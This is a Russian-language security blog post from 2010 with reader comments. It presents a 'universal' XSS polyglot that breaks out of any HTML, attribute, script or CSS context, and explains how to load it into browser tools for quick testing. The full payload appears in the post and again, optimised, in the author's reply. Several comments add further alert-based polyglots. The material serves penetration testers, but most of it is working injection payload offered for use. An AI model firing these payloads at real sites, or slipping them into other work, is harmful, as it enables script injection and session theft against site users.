Универсальный XSS-вектор

Поиск XSS довольно трудоемкое занятие, так как необходимо учитывать множество контекстов, в которых может выполниться js-код, например внутри одинарных или двойных кавычек, внутри различных атрибутов и т.д. Для тех, кому надоело перебирать возможные варианты, пригодится следующий универсальный xss-вектор, который выполнится в любом контексте, т.е. его можно поместить в любой параметр и не беспокоится о том, в какой участок кода он в конечном счете попадет:

javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression&#40&#47;&#42;’/-/*&#39;,/**/eval(name)//&#41;;width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"

Размер немного великоват (428 байт), но это в любом случае более продуктивный вариант, чем "><script>alert()</script>.
Для удобного использования в Opera можно добавить данный вектор как заполнитель формы (Меню – Настройки – Общие настройки – Формы), для Firefox с плагином TamperData можно создать новый элемент контекстного меню для перехватываемых пакетов.

Credits: Gareth Heyes @ thespanner.co.uk

Posted

15 September 2010

Misc

Raz0r

Tags:

exploit, javascript, xss, взлом

Comments

16 responses to “Универсальный XSS-вектор”

Dmitry

15 September 2010

>> Размер немного великоват (428 байт)
и дело не только в размере… способ довольно палевный в контексте автомитизированного тестирования
Raz0r

15 September 2010

С этим не поспоришь, но если применять точечно, то будет довольно эффективно
Ruslan

16 September 2010

Круто было бы если бы Вы его еще разобрали подробненько а не просто пыплескнули сюда 🙂 А вообще спасибо!
Raz0r

16 September 2010
Если разбирать вектор, то видно, что закрываются все комментарии, кавычки, такие тэги как title, script, style и др. Сам payload исполняется внутри атрибутов для тега img и в значении свойства expression в CSS (исключительно для IE). Кстати в посте вектор был обновлен, оптимизированную версию предложил LeverOne (теперь 373 байта):
```
javascript:/*--></script></title></textarea></noscript></style></xmp></noembed></comment></xml></iframe>">[img=1]<img -/style=-=expression&#40&#47;&#42;’/-/*&#39;,/**/eval(name)//&#41;;width:100%;height:100%;position:absolute; name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"
```
Ruslan

17 September 2010

Пока ждал ваш ответ, сам разобралсо 🙂
Спасибо 🙂
LO

18 September 2010

Я пока ничего не предлагал, только указал на очевидные проблемы кода.
http://sla.ckers.org/forum/read.php?24,35645
Судя по всему, он концептуально должен выглядеть по-другому. Ни о какой минимизации, чтобы байты высчитывать, на данный момент речи не идет : там ведь даже в HTML-эквивалентах не убраны разделители.
M4g

12 October 2010

реальный пример, где можно увидеть, что эта конструкция лучше “>alert().? как-то страшно это выглядит)
M4g

12 October 2010

упс, обрезалось “@@script@alert()@/script@
AD0

19 November 2010

в хром есть варианты как добавить?
Anonymous

7 February 2011

‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))
Nixx

24 April 2011

Сделал сканер поиска sql на сайте.Решил проверить сканером 17 xss нашел и этот вектор тоже работает.Короче как пхп тулзы зашишать.
Anonymous

13 September 2011

javascript:/*–>”>[img=1]”
S

26 March 2012

javascript:/*–>”>[img=1]”
hhh

19 March 2013

javascript:/*–>”>[img=1]”
Anonymous

3 July 2013

javascript:/*–>”>[img=1]”
s
Anonymous

4 July 2013

javascript:/*–>»>[img=1]»